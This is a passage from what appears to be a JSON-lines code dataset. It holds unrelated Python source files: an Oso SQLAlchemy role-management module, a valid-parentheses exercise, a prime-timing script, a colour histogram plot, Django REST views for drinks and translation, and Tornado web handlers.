``users``. \\\n NOTE: only one role model can be created per resource model. Attempting to call \\\n ``resource_role_class()`` more than once for the same resource model will result in \\\n a ``ValueError``.\n\n :param roles: An order-independent list of the built-in roles for this resource-specific role type.\n :type roles: List[str]\n\n :param mutually_exclusive: Boolean flag that sets whether or not users \\\n can have more than one role for a given resource. Defaults to ``True``.\n :type roles: bool\n\n :return: the ResourceRole mixin, which must then be mixed into a SQLAlchemy model for the role. E.g.,\n\n .. code-block:: python\n\n OrganizationRoleMixin = oso_roles.resource_role_class(\n Base, User, Organization, [\"OWNER\", \"MEMBER\", \"BILLING\"]\n )\n\n class OrganizationRole(Base, OrganizationRoleMixin):\n pass\n\n\n \"\"\"\n\n global ROLE_CLASSES\n if resource_model in [role.get(\"resource_model\") for role in ROLE_CLASSES]:\n raise ValueError(\n f\"Cannot create two Role classes for the same `resource_model`: {resource_model.__name__}\"\n )\n\n ROLE_CLASSES.append(\n {\n \"user_model\": user_model,\n \"resource_model\": resource_model,\n }\n )\n\n resource_name = _get_resource_name_lower(resource_model)\n tablename = f\"{resource_name}_roles\"\n if mutually_exclusive:\n unique_constraint = UniqueConstraint(f\"{resource_name}_id\", \"user_id\")\n else:\n unique_constraint = UniqueConstraint(f\"{resource_name}_id\", \"name\", \"user_id\")\n\n class ResourceRoleMixin:\n choices = role_choices\n\n __tablename__ = tablename\n id = Column(Integer, primary_key=True)\n name = Column(String())\n __table_args__ = (unique_constraint,)\n\n @validates(\"name\")\n def validate_name(self, key, name):\n if name not in self.choices:\n raise ValueError(\n f\"{name} Is not a valid choice for {self.__class__.__name__}\"\n )\n return name\n\n @declared_attr\n def user_id(cls):\n type = inspect(user_model).primary_key[0].type\n name = inspect(user_model).primary_key[0].name\n table_name = user_model.__tablename__\n return Column(type, ForeignKey(f\"{table_name}.{name}\"))\n\n @declared_attr\n def user(cls):\n return relationship(user_model.__name__, backref=tablename)\n\n @declared_attr\n def resource_id(cls):\n type = inspect(resource_model).primary_key[0].type\n name = inspect(resource_model).primary_key[0].name\n table_name = resource_model.__tablename__\n return Column(type, ForeignKey(f\"{table_name}.{name}\"))\n\n @declared_attr\n def resource(cls):\n return relationship(resource_model.__name__, backref=\"roles\")\n\n setattr(ResourceRoleMixin, f\"{resource_name}_id\", resource_id)\n setattr(ResourceRoleMixin, resource_name, resource)\n\n # Add the relationship between the user_model and the resource_model\n resources = relationship(\n resource_model.__name__,\n secondary=tablename,\n viewonly=True,\n backref=\"users\",\n sync_backref=False,\n )\n # @Q: Do we try to pluralize this name correctly?\n setattr(user_model, resource_name + \"s\", resources)\n\n return ResourceRoleMixin\n\n\ndef enable_roles(oso):\n # TODO: ensure this docstring is still accurate\n \"\"\"Enable the SQLAlchemy Role-Based Access Control base policy. This method activates the following polar rules:\n\n ``role_allow(role, action, resource)``:\n Allows actors that have the role ``role`` to take ``action`` on\n ``resource``. ``role`` is a SQLAlchemy role model generated by\n :py:meth:`sqlalchemy_oso.roles.resource_role_class`. ``resource``\n is a SQLAlchemy model to which the ``role`` applies. Roles apply\n to the resources they are scoped to, For example,\n ``OrganizationRole`` roles apply to ``Organization`` resources.\n Roles may also apply to resources as specified by\n ``resource_role_applies_to`` Polar rules. E.g.,\n\n .. code-block:: polar\n\n role_allow(role: OrganizationRole{name: \"MEMBER\"}, \"READ\", org: Organization);\n\n\n ``resource_role_applies_to(child_resource, parent_resource)``:\n Permits roles that control access to `parent_resource` apply to\n `child_resource` as well. `parent_resource` must be a resource\n that has a resource role class associated with it (see\n :py:meth:`sqlalchemy_oso.roles.resource_role_class`). E.g.,\n\n .. code-block:: polar\n\n ### An organization's roles apply to its child repositories\n resource_role_applies_to(repo: Repository, parent_org) if\n parent_org = repo.organization;\n\n The above rule makes it possible to write `role_allow` rules\n between `OrganizationRole` and `Repository`. E.g.,\n\n .. code-block:: polar\n\n role_allow(role: OrganizationRole{name: \"MEMBER\"}, \"READ\", repo: Repository);\n\n ``[resource_name]_role_order([\"ROLE_NAME_1\", \"ROLE_NAME_2\",...])``:\n Specifies a hierarchical role order for built-in\n resource-specific roles defined with\n :py:meth:`sqlalchemy_oso.roles.resource_role_class` The rule name\n is the lower-cased resource model name followed by\n ``_role_order``. The only parameter is a list of role names in\n hierarchical order. Roles to the left will inherit the\n permissions of roles to the right. This is useful if any role\n should inherit all the permissions of another role. It is not\n required for all built-in roles to be specified in the list. E.g.,\n\n .. code-block:: polar\n\n repository_role_order([\"ADMIN\", \"MAINTAIN\", \"WRITE\", \"TRIAGE\", \"READ\"]);\n\n Is the equivalent of writing:\n\n .. code-block:: polar\n\n role_allow(role: RepositoryRole{name: \"ADMIN\"}, _action, _resource) if\n role_allow(new RepositoryRole{name: \"MAINTAIN\"}, _action, _resource);\n\n role_allow(role: RepositoryRole{name: \"MAINTAIN\"}, _action, _resource) if\n role_allow(new RepositoryRole{name: \"WRITE\"}, _action, _resource);\n\n ...and so on.\n\n\n :param oso: The Oso instance used to evaluate the policy.\n :type oso: Oso\n \"\"\"\n\n if not _OsoSession.set:\n raise Exception(\n \"Sqlalchemy roles requires the sqlalchemy OsoSession. Please call session.set_get_session before enable_roles.\"\n )\n\n global ROLE_CLASSES\n\n policy = \"\"\"\n # RBAC BASE POLICY\n\n ## Top-level RBAC allow rule\n\n ### The association between the resource roles and the requested resource is outsourced from the rbac_allow\n allow(user, action, resource) if\n resource_role_applies_to(resource, role_resource) and\n user_in_role(user, role, role_resource) and\n role_allow(role, action, resource);\n\n # RESOURCE-ROLE RELATIONSHIPS\n\n ## These rules allow roles to apply to resources other than those that they are scoped to.\n ## The most common example of this is nested resources, e.g. Repository roles should apply to the Issues\n ## nested in that repository.\n\n ### A resource's roles applies to itself\n resource_role_applies_to(role_resource, role_resource);\n\n # ROLE-ROLE RELATIONSHIPS\n\n ## Role Hierarchies\n\n ### Grant a role permissions that it inherits from a more junior role\n role_allow(role, action, resource) if\n inherits_role(role, inherited_role) and\n role_allow(inherited_role, action, resource);\n\n ### Helper to determine relative order or roles in a list\n inherits_role_helper(role, inherited_role, role_order) if\n ([first, *rest] = role_order and\n role = first and\n inherited_role in rest) or\n ([first, *rest] = role_order and\n inherits_role_helper(role, inherited_role, rest));\n \"\"\"\n\n for role_model in ROLE_CLASSES:\n user_model = role_model[\"user_model\"]\n user = user_model.__name__\n resource_model = role_model[\"resource_model\"]\n resource = resource_model.__name__\n role = get_role_model_for_resource_model(resource_model).__name__\n\n policy += f\"\"\"\n user_in_role(user: {user}, role, resource: {resource}) if\n session = OsoSession.get() and\n role in session.query({role}).filter_by(user: user) and\n role.{resource.lower()}.id = resource.id;\n\n inherits_role(role: {role}, inherited_role) if\n {resource.lower()}_role_order(role_order) and\n inherits_role_helper(role.name, inherited_role_name, role_order) and\n inherited_role = new {role}(name: inherited_role_name, {resource.lower()}: role.{resource.lower()});\n \"\"\"\n oso.load_str(policy)\n\n\n# ROLE HELPERS\n\n\ndef _get_resource_name_lower(resource_model):\n return resource_model.__name__.lower()\n\n\ndef _check_valid_model(*args, raise_error=True):\n for model in args:\n valid = True\n try:\n class_mapper(model)\n except UnmappedClassError:\n valid = False\n\n if raise_error and not valid:\n raise TypeError(f\"Expected a model (mapped class); received: {model}\")\n\n\ndef _check_valid_instance(*args, raise_error=True):\n for instance in args:\n valid = True\n try:\n object_mapper(instance)\n except UnmappedInstanceError:\n valid = False\n\n if raise_error and not valid:\n raise TypeError(f\"Expected a mapped object instance; received: {instance}\")\n\n\ndef get_role_model_for_resource_model(resource_model):\n _check_valid_model(resource_model)\n return (\n inspect(resource_model, raiseerr=True)\n .relationships.get(\"roles\")\n .argument.class_\n )\n\n\ndef get_user_model_for_resource_model(resource_model):\n _check_valid_model(resource_model)\n return inspect(resource_model).relationships.get(\"users\").argument.class_\n\n\ndef get_user_roles(session, user, resource_model, resource_id=None):\n \"\"\"Get a user's roles for all resources of a single resource type.\n E.g., get all of a user's repositories and their role for each\n repository.\n Or optionally, all roles scoped to a specific resource_id.\n\n :param session: SQLAlchemy session\n :type session: sqlalchemy.orm.session.Session\n\n :param user: user record (python object) of the SQLAlchemy user model \\\n associated with roles scoped to the supplied ``resource_model``\n\n :param resource_id: (optional) the resource id for which to get the user's roles.\n\n :return: list of the user's roles\n \"\"\"\n _check_valid_instance(user)\n _check_valid_model(resource_model)\n role_model = get_role_model_for_resource_model(resource_model)\n\n roles = (\n session.query(role_model)\n .join(resource_model)\n .filter(role_model.user == user)\n .order_by(resource_model.id)\n .order_by(role_model.name)\n )\n\n if resource_id:\n roles = roles.filter(resource_model.id == resource_id)\n return roles.all()\n\n\ndef get_resource_roles(session, resource):\n \"\"\"Get all of the roles for a specific resource. E.g.,\n get all the roles in Organization 1. Each role has a single user\n associated with it, which can be accessed by calling ``role.user``.\n\n :param session: SQLAlchemy session\n :type session: sqlalchemy.orm.session.Session\n\n :param resource: the resource record (python object) for which to get \\\n the users and roles\n\n :return: list of the user's roles\n :return: List of roles associated with the ``resource``\n\n \"\"\"\n _check_valid_instance(resource)\n return resource.roles\n\n\n# - Get all the users who have a specific role\ndef get_resource_users_by_role(session, resource, role_name):\n \"\"\"Get all of the users that have a specific role for a specific\n resource. E.g., get all the users in Organization 1 that have the \"OWNER\"\n role.\n\n :param session: SQLAlchemy session\n :type session: sqlalchemy.orm.session.Session\n\n :param resource: the resource record (python object) for which to get \\\n the users\n\n :param role_name: the name of the role to get users for\n :type role_name: str\n\n :return: List of users that have the ``role_name`` role for \\\n ``resource``\n\n \"\"\"\n # TODO: would it be helpful to aggregate the roles by name if `role_name`\n # is None? E.g. return a dict of {role_name: [users]}?\n _check_valid_instance(resource)\n resource_model = type(resource)\n role_model = get_role_model_for_resource_model(resource_model)\n user_model = get_user_model_for_resource_model(resource_model)\n\n users = (\n session.query(user_model)\n .join(role_model)\n .filter_by(repository=resource, name=role_name)\n .order_by(user_model.id)\n .all()\n )\n\n return users\n\n\n# - Assign a user to an organization with a role\ndef add_user_role(session, user, resource, role_name, commit=False):\n \"\"\"Add a user to a role for a specific resource.\n\n :param session: SQLAlchemy session\n :type session: sqlalchemy.orm.session.Session\n\n :param user: user record (python object) to assign the role to\n\n :param role_name: the name of the role to assign to the user\n :type role_name: str\n\n :param commit: flag to specify whether or not session should be committed after adding role; defaults to ``False``\n :type commit: boolean\n \"\"\"\n _check_valid_instance(user, resource)\n # get models\n resource_model = type(resource)\n role_model = get_role_model_for_resource_model(resource_model)\n\n # create and save role\n resource_name = _get_resource_name_lower(resource_model)\n kwargs = {\"name\": role_name, resource_name: resource, \"user\": user}\n new_role = role_model(**kwargs)\n session.add(new_role)\n if commit:\n try:\n session.commit()\n except IntegrityError:\n session.rollback()\n raise Exception(\n f\"\"\"Cannot assign user {user} to role {role_name} for\n {resource_name} either because the assignment already exists, or\n because the role is mutually exclusive and the user already has\n another role for this resource.\"\"\"\n )\n\n\n# - Delete a user to an organization with a role\ndef delete_user_role(session, user, resource, role_name=None, commit=False):\n \"\"\"Remove a user from a role for a specific resource.\n\n :param session: SQLAlchemy session\n :type session: sqlalchemy.orm.session.Session\n\n :param user: user record (python object) to remove the role from\n\n :param role_name: the name of the role to remove from the user. If not \\\n provided, the function will remove all roles the user has for \\\n ``resource``.\n :type role_name: str\n\n :param commit: flag to specify whether or not session should be committed after deleting role; defaults to ``False``\n :type commit: boolean\n \"\"\"\n _check_valid_instance(user, resource)\n resource_model = type(resource)\n resource_name = _get_resource_name_lower(resource_model)\n role_model = get_role_model_for_resource_model(resource_model)\n\n filter_kwargs = {\"user\": user, resource_name: resource}\n if role_name:\n filter_kwargs[\"name\"] = role_name\n roles = session.query(role_model).filter_by(**filter_kwargs)\n\n roles.delete()\n if commit:\n session.commit()\n\n\n# - Change the user's role in an organization\ndef reassign_user_role(session, user, resource, role_name, commit=False):\n \"\"\"Remove all existing roles that a user has for a specific resource, and\n reassign the user to a new role. If the user does not have any roles for\n the given resource, the behavior is the same as\n :py:meth:`sqlalchemy_oso.roles.add_user_role`.\n\n :param session: SQLAlchemy session\n :type session: sqlalchemy.orm.session.Session\n\n :param user: user record (python object) whose role should be reassigned\n\n :param role_name: the name of the new role to assign to the user\n :type role_name: str\n\n :param commit: flag to specify whether or not session should be committed after reassigning role; defaults to ``False``\n :type commit: boolean\n \"\"\"\n _check_valid_instance(user, resource)\n resource_model = type(resource)\n resource_name = _get_resource_name_lower(resource_model)\n role_model = get_role_model_for_resource_model(resource_model)\n\n filter_kwargs = {\"user\": user, resource_name: resource}\n\n session.query(role_model).filter_by(**filter_kwargs).update({\"name\": role_name})\n\n if commit:\n session.commit()\n","repo_name":"simmsb/oso-patch","sub_path":"sqlalchemy_oso/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":18594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35571964735","text":"\"\"\"\n-- Created by Pravesh Budhathoki\n-- Created on 2023-06-12\n\"\"\"\n\n\n# 20. Valid parenthesis\n# Given a string s containing just the characters '(', ')', '{', '}', '[' and ']', determine if the input string is valid.\n#\n# An input string is valid if:\n#\n# Open brackets must be closed by the same type of brackets.\n# Open brackets must be closed in the correct order.\n# Every close bracket has a corresponding open bracket of the same type.\n# Example 1:\n# Input: s = \"()\"\n# Output: true\n#\n# Example 2:\n# Input: s = \"()[]{}\"\n# Output: true\n#\n# Example 3:\n# Input: s = \"(]\"\n# Output: false\nclass Solution:\n def isValid(self, s: str) -> bool:\n stack = []\n for string in s:\n if string in [\"(\", \"{\", \"[\"]:\n stack.append(string)\n elif string == \")\" and len(stack) != 0 and stack[-1] == \"(\":\n stack.pop()\n elif string == \"}\" and len(stack) != 0 and stack[-1] == \"{\":\n stack.pop()\n elif string == \"]\" and len(stack) != 0 and stack[-1] == \"[\":\n stack.pop()\n else:\n return False\n return stack == []\n\n\nif __name__ == '__main__':\n solution = Solution()\n _s = \"[\"\n result = solution.isValid(_s)\n print(result)\n","repo_name":"Pravesh22/code_practice","sub_path":"valid_parenthesis.py","file_name":"valid_parenthesis.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26698536906","text":"import time\n\ndef calcPrime(n):\n primes = [2,3]\n for i in range(2, n):\n isPrime = True\n for j in primes:\n if (i % j == 0):\n isPrime = False\n if(isPrime):\n primes.append(i)\n return primes\n\ndef calcTime(fun):\n t = time.time()\n fun\n return (time.time() - t)\n\nif __name__ == '__main__':\n prList1 = []\n tim1 = 0.0\n prList1 = calcPrime(1000)\n tim1 = calcTime(calcPrime(1000))\n prList2 = []\n tim2 = 0.0\n prList2 = calcPrime(10000)\n tim2 = calcTime(calcPrime(10000))\n print('Elapsed time for calculating prime numbers 0 - 1000:', tim1)\n print('Elapsed time for calculating prime numbers 0 - 10000:', tim2)\n","repo_name":"amirhpd/AST_Ex02","sub_path":"AST-2018-WT-ExSheet-02-Rashid-Pakdaman/Ex5/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34594440258","text":"import colorsys\nimport pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.interpolate import interp1d\n\ndef get_hsv(hexrgb):\n hexrgb = hexrgb.lstrip(\"#\") # in case you have Web color specs\n r, g, b = (int(hexrgb[i:i + 2], 16) / 255.0 for i in (0, 2, 4))\n return colorsys.rgb_to_hsv(r, g, b)\n\ndef main():\n with open('storage.pkl', 'rb') as f:\n storage = pickle.load(f)\n\n\n hlist = []\n for group in storage:\n for color in group:\n h,s,v=get_hsv(color)\n if s>0 and v>0:\n hlist.append(h)\n\n n=100\n bins = np.arange(-0.01,1.01,0.01)\n\n probs, bons = np.histogram(hlist, normed=1, bins=bins)\n vect=np.linspace(0.0, 2 * np.pi, n, endpoint=False)\n\n # vect=np.append(vect, vect[0])\n # probs=np.append(probs, probs[0])\n\n\n f2 = interp1d(vect, probs[1:], kind='cubic')\n\n\n\n # N = 1000\n # bottom = 8\n # max_height = 4\n\n xnew = np.linspace(min(vect), max(vect), 10000, endpoint=False)\n\n\n ax = plt.subplot(111, polar=True)\n ax.plot(xnew,np.ones(len(xnew))*2,color='black')\n ax.plot(xnew,np.ones(len(xnew))*10,color='black')\n\n # ax.plot(xnew, f2(xnew)*4)\n\n width = (2 * np.pi) / 10000\n ax = plt.subplot(111, polar=True)\n bars = ax.bar(xnew, f2(xnew), width=width, bottom=2,linewidth=0)\n\n # Use custom colors and opacity\n # for r, bar in zip(xnew, bars):\n # bar.set_facecolor(colorsys.hsv_to_rgb(r, 1, 1))\n # bar.set_alpha(0.8)\n\n # Use custom colors and opacity\n for r, bar in zip(xnew, bars):\n bar.set_facecolor(colorsys.hsv_to_rgb(r/( 2 * np.pi), 1, 1))\n bar.set_alpha(0.75)\n plt.axis('off')\n\n plt.savefig('figures/radial_colors.png',dpi=300)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NicholasARossi/color_me_impressed","sub_path":"color_histogram_plot.py","file_name":"color_histogram_plot.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"7"} +{"seq_id":"73691526623","text":"from django.http import JsonResponse\nfrom .models import Drink, Translation\nfrom .serializer import DrinkSerializer, TranslationSerializer\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom datetime import datetime\n\nfrom drinks import OWLTrans\n#from OwlTranslation import OwlTranslation\n\n@api_view(['GET', 'POST'])\ndef drink_list(request):\n\n if request.method=='GET':\n drinks = Drink.objects.all()\n serializer = DrinkSerializer(drinks, many=True)\n return JsonResponse({'drinks': serializer.data})\n\n if request.method=='POST':\n serializer = DrinkSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n@api_view(['GET', 'PUT', \"DELETE\"])\ndef drink_detail(request, id):\n try:\n drink = Drink.objects.get(pk=id)\n except Drink.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n if request.method=='GET':\n serializer = DrinkSerializer(drink)\n return Response(serializer.data)\n elif request.method == 'PUT':\n serializer = DrinkSerializer(drink, data=request.data)\n if (serializer.is_valid()):\n serializer.save()\n return Response(serializer.data)\n elif request.method == 'DELETE':\n drink.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['POST'])\ndef doTranslation(request) :\n print(\"LOG doTranslation is called with \", request.data)\n #yoonFuncs.printFunc()\n #result = onmtModel.translate(request.data['src'], request.data['srcText'])\n request.data['timeStamp'] = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\n\n result = \"\"\n if request.data['src']=='ko' and request.data['tgt']=='en':\n result = OWLTrans.translateKoEn([request.data['srcText']])\n\n elif request.data['src'] == 'en' and request.data['tgt']=='ko':\n print(\"[LOG] if en and ko\")\n result = OWLTrans.translateEnKo([request.data['srcText']])\n\n print(\"[LOG result]\", result) \n request.data['tgtText'] = result[0]\n print(request.data)\n\n if request.method=='POST':\n serializer = TranslationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n print(\"LOG is not valid!! something error ...\")\n return Response(serializer.errors)","repo_name":"YoonjungChoi/CMPE295_NMT_Project","sub_path":"webApps/backend/drinks/drinks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"4078956367","text":"import tornado.web\nimport json\nimport requests\nimport os\nimport sys\nfrom datetime import datetime, timedelta\nfrom dateutil import parser\n\n\n#########################\n# Useful misc handlers #\n#########################\n\nERROR_CODES = {\n 400: \"Bad Request\",\n 401: \"Unauthorized\",\n 403: \"Forbidden\",\n 404: \"Page Not Found\",\n 405: \"Method Not Allowed\",\n 406: \"Not Acceptable\",\n 407: \"Proxy Authentication Required\",\n 408: \"Request Timeout\",\n 414: \"Request-URI Too Long\",\n 500: \"Internal Server Error\",\n 501: \"Not Implemented\",\n 502: \"Bad Gateway\",\n 503: \"Service Unavailable\",\n 504: \"Gateway Timeout\",\n 511: \"Network Authentication Required\",\n}\n\n\nclass User(object):\n \"\"\"A minimal user class\"\"\"\n\n def __init__(self, name, email, roles):\n self.name = name\n self.email = email\n self.roles = roles\n\n @property\n def is_admin(self):\n return \"admin\" in self.roles\n\n @property\n def is_pricing_admin(self):\n return \"pricing_admin\" in self.roles\n\n @property\n def is_sample_requirements_admin(self):\n return \"sample_requirements_admin\" in self.roles\n\n @property\n def is_any_admin(self):\n return (\n self.is_admin or self.is_pricing_admin or self.is_sample_requirements_admin\n )\n\n @property\n def is_proj_coord(self):\n return \"proj_coord\" in self.roles\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n \"\"\"Base Handler. Handlers should not inherit from this\n class directly but from either SafeHandler or UnsafeHandler\n to make security status explicit.\n\n \"\"\"\n\n def get(self):\n \"\"\"The GET method on this handler will be overwritten by all other handler.\n\n As it is the default handler used to match any request that is not mapped\n in the main app, a 404 error will be raised in that case (because the get method\n won't be overwritten in that case)\n \"\"\"\n raise tornado.web.HTTPError(404, reason=\"Page not found\")\n\n def get_current_user(self):\n # Disables authentication if test mode to ease integration testing\n if self.application.test_mode:\n name = \"Testing User!\"\n roles = [\n \"admin\",\n \"pricing_admin\",\n \"sample_requirements_admin\",\n \"proj_coord\",\n ]\n email = \"Testing User!\"\n else:\n name = (\n str(self.get_secure_cookie(\"user\"), \"utf-8\")\n if self.get_secure_cookie(\"user\")\n else None\n )\n # Fix ridiculous bug with quotation marks showing on the web\n if name:\n if (name[0] == '\"') and (name[-1] == '\"'):\n name = name[1:-1]\n roles = (\n json.loads(str(self.get_secure_cookie(\"roles\"), \"utf-8\"))\n if self.get_secure_cookie(\"roles\")\n else [\"user\"]\n )\n email = (\n str(self.get_secure_cookie(\"email\"), \"utf-8\")\n if self.get_secure_cookie(\"email\")\n else None\n )\n user = User(name, email, roles)\n if user.name:\n return user\n else:\n return None\n\n def write_error(self, status_code, **kwargs):\n \"\"\"Overwrites write_error method to have custom error pages.\n\n http://tornado.readthedocs.org/en/latest/web.html#tornado.web.RequestHandler.write_error\n \"\"\"\n reason = \"Unknown Error\"\n\n # Get information about the triggered exception\n self.application.gs_globals[\"exception_fulltext\"] = repr(sys.exc_info())\n\n # Get the status code and error reason\n if status_code in list(ERROR_CODES):\n reason = ERROR_CODES[status_code]\n try:\n if \"exc_info\" in kwargs:\n _, error, _ = kwargs[\"exc_info\"]\n reason = error.reason\n except AttributeError:\n pass\n\n # Return JSON if this is an API call\n if \"/api/v1/\" in self.request.uri:\n jsondict = {\n \"page_title\": \"Error {}: {}\".format(status_code, reason),\n \"error_status\": status_code,\n \"error_reason\": reason,\n \"error_exception\": self.application.gs_globals[\"exception_fulltext\"],\n }\n self.set_header(\"Content-type\", \"application/json\")\n self.write(json.dumps(jsondict))\n\n # Render the error template\n else:\n t = self.application.loader.load(\"error_page.html\")\n self.write(\n t.generate(\n gs_globals=self.application.gs_globals,\n status=status_code,\n reason=reason,\n user=self.get_current_user(),\n )\n )\n\n def get_multiqc(self, project_id):\n \"\"\"\n Getting multiqc reports for requested project from the filesystem\n Returns a string containing html if report exists, otherwise None\n \"\"\"\n view = self.application.projects_db.view(\"project/id_name_dates\")\n rows = view[project_id].rows\n project_name = \"\"\n multiqc_reports = {}\n # get only the first one\n for row in rows:\n project_name = row.value.get(\"project_name\", \"\")\n break\n\n if project_name:\n multiqc_path = self.application.multiqc_path or \"\"\n for type in [\"_\", \"_qc_\", \"_pipeline_\"]:\n multiqc_name = \"{}{}multiqc_report.html\".format(project_name, type)\n multiqc_file_path = os.path.join(multiqc_path, multiqc_name)\n if os.path.exists(multiqc_file_path):\n with open(multiqc_file_path, \"r\", encoding=\"utf-8\") as multiqc_file:\n html = multiqc_file.read()\n multiqc_reports[type] = html\n return multiqc_reports\n\n @staticmethod\n def get_user_details(app, user_email):\n user_details = {}\n if user_email == \"Testing User!\":\n user_email = app.settings.get(\"username\", None) + \"@scilifelab.se\"\n user_details = {\n \"userpreset\": {\"Hardcoded One\": {}}\n } # Just to show something locally\n rows = app.gs_users_db.view(\"authorized/users\", include_docs=True)[\n user_email\n ].rows\n if len(rows) == 1:\n user_details = dict(rows[0].doc)\n\n return user_details\n\n\nclass SafeHandler(BaseHandler):\n \"\"\"All handlers that need authentication and authorization should inherit\n from this class.\n \"\"\"\n\n @tornado.web.authenticated\n def prepare(self):\n \"\"\"This method is called before any other method.\n\n Having the decorator @tornado.web.authenticated here implies that all\n the Handlers that inherit from this one are going to require\n authentication in all their methods.\n \"\"\"\n pass\n\n\nclass UnsafeHandler(BaseHandler):\n pass\n\n\nclass MainHandler(UnsafeHandler):\n \"\"\"Serves the html front page upon request.\"\"\"\n\n def get(self):\n t = self.application.loader.load(\"index.html\")\n user = self.get_current_user()\n # Avoids pulling all historic data by assuming we have less than 30 NAS:es\n view = self.application.server_status_db.view(\n \"nases/by_timestamp\", descending=True, limit=30\n )\n latest = max([parser.parse(row.key) for row in view.rows])\n # assuming that status db is not being updated more often than every 5 minutes\n reduced_rows = [\n row\n for row in view.rows\n if latest - parser.parse(row.key) <= timedelta(minutes=5)\n ]\n instruments = self.application.server_status[\"instruments\"]\n server_status = {}\n for row in reduced_rows:\n server = row.value.get(\"name\")\n if server is None:\n continue\n if server not in server_status:\n server_status[server] = row.value\n server_status[server][\"instrument\"] = instruments.get(server, \"-\")\n used_percentage = float(\n row.value.get(\"used_percentage\", \"0\").replace(\"%\", \"\")\n )\n if used_percentage > 60:\n server_status[server][\"css_class\"] = \"q-warning\"\n elif used_percentage > 80:\n server_status[server][\"css_class\"] = \"q-danger\"\n else:\n server_status[server][\"css_class\"] = \"\"\n # sort by used space\n server_status = sorted(\n server_status.items(),\n key=lambda item: item[1].get(\"used_percentage\"),\n reverse=True,\n )\n # Load presets to populate the projects links\n presets_list = self.get_argument(\"presets_list\", \"pv_presets\")\n presets = {}\n if self.get_current_user():\n user_details = self.get_user_details(\n self.application, self.get_current_user().email\n )\n presets = {\n \"default\": self.application.genstat_defaults.get(presets_list),\n \"user\": user_details.get(\"userpreset\"),\n }\n\n self.write(\n t.generate(\n gs_globals=self.application.gs_globals,\n user=user,\n server_status=server_status,\n presets=presets,\n )\n )\n\n\ndef dthandler(obj):\n \"\"\"ISO formatting for datetime to be used in JSON.\"\"\"\n if hasattr(obj, \"isoformat\"):\n return obj.isoformat()\n else:\n raise TypeError(\"Object can not be isoformatted.\")\n\n\n################################\n# Useful data-serving handlers #\n################################\n\n\nclass DataHandler(UnsafeHandler):\n \"\"\"Serves a listing of all available URL's in the web service.\"\"\"\n\n def get(self):\n self.set_header(\"Content-type\", \"application/json\")\n handlers = []\n for h in self.application.declared_handlers:\n try:\n handlers.append(h[0])\n except TypeError: # 'URLSpec' object does not support indexing\n handlers.append(h.regex.pattern)\n api = [h for h in handlers if h.startswith(\"/api\")]\n utils = [h for h in handlers if h == \"/login\" or h == \"/logout\" or h == \".*\"]\n pages = list(set(handlers).difference(set(api)).difference(set(utils)))\n pages = [h for h in pages if not (h.endswith(\"?\") or h.endswith(\"$\"))]\n pages.sort(reverse=True)\n api.sort(reverse=True)\n self.write(json.dumps({\"api\": api, \"pages\": pages}))\n\n\nclass UpdatedDocumentsDatahandler(SafeHandler):\n \"\"\"Serves a list of references to the last updated documents in the\n databases Status gets data from.\n\n Specify to get the latest items by ?items=.\n\n Loaded through /api/v1/last_updated\n \"\"\"\n\n def get(self):\n num_items = int(self.get_argument(\"items\", 25))\n self.set_header(\"Content-type\", \"application/json\")\n self.write(json.dumps(self.list_updated(num_items)))\n\n def list_updated(self, num_items=25):\n last = []\n\n view = self.application.projects_db.view(\n \"time/last_updated\", limit=num_items, descending=True\n )\n for doc in view:\n last.append((doc.key, doc.value, \"Project information\"))\n\n view = self.application.flowcells_db.view(\n \"time/last_updated\", limit=num_items, descending=True\n )\n for doc in view:\n last.append((doc.key, doc.value, \"Flowcell information\"))\n\n last = sorted(last, key=lambda tr: tr[0], reverse=True)\n return last[:num_items]\n\n\nclass NoCacheStaticFileHandler(tornado.web.StaticFileHandler):\n \"\"\"Serves up static files without any tornado caching.\n https://gist.github.com/omarish/5499385\n \"\"\"\n\n def set_extra_headers(self, path):\n self.set_header(\"Cache-control\", \"no-cache\")\n\n\nclass LastPSULRunHandler(SafeHandler):\n \"\"\"Gives the date of the last PSUL run, assumin the logfile is where we expect it\"\"\"\n\n def get(self):\n logfile = self.application.psul_log\n response = {}\n try:\n text_timestamp = os.stat(logfile).st_mtime\n delta = datetime.now() - datetime.fromtimestamp(int(text_timestamp))\n except (OSError, KeyError, TypeError):\n response[\"status\"] = \"Log File '{}' not found.\".format(logfile)\n else:\n response[\"status\"] = \"Success\"\n response[\"hours\"] = int(delta.seconds / 3600)\n response[\"minutes\"] = int((delta.seconds % 3600) / 60)\n response[\"seconds\"] = int(delta.seconds % 60)\n\n self.set_header(\"Content-type\", \"application/json\")\n self.write(json.dumps(response))\n\n\n########################\n# Other useful classes #\n########################\n\n\nclass GoogleUser(object):\n \"\"\"Stores the information that google returns from a user throuhgh its secured API.\"\"\"\n\n def __init__(self, user_token):\n assert \"access_token\" in user_token\n\n self.user_token = user_token\n self._google_plus_api = \"https://www.googleapis.com/plus/v1/people/me\"\n\n # Fetch actual information from Google API\n params = {\"access_token\": self.user_token.get(\"access_token\")}\n r = requests.get(self._google_plus_api, params=params)\n if not r.status_code == requests.status_codes.codes.OK:\n self.authenticated = False\n else:\n self.authenticated = True\n info = 